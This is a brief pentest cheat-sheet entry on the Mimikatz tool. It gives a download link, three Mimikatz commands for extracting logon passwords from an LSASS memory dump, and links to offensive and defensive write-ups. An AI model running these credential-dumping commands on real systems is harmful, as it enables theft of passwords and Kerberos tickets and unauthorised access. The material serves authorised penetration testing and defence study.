Internal Infrastructure Pentest - Mimikatz

less than 1 minute read

Mimikatz: mimikatz is a tool gentilkiwi made to learn C and make somes experiments with Windows security. It’s now well known to extract plaintexts passwords, hash, PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash, pass-the-ticket or build Golden tickets.

Download: https://github.com/gentilkiwi/mimikatz/releases

Commands to run on lsass dump file:

  • mimikatz # privilege::debug
  • mimikatz # sekurlsa::minidump lsass.dmp
  • mimikatz # sekurlsa::logonPasswords

Blogs:

  • https://adsecurity.org/?page_id=1821
  • https://www.sans.org/reading-room/whitepapers/detection/mimikatz-overview-defenses-detection-36780
  • https://www.offensive-security.com/metasploit-unleashed/mimikatz/
  • http://blog.gentilkiwi.com/mimikatz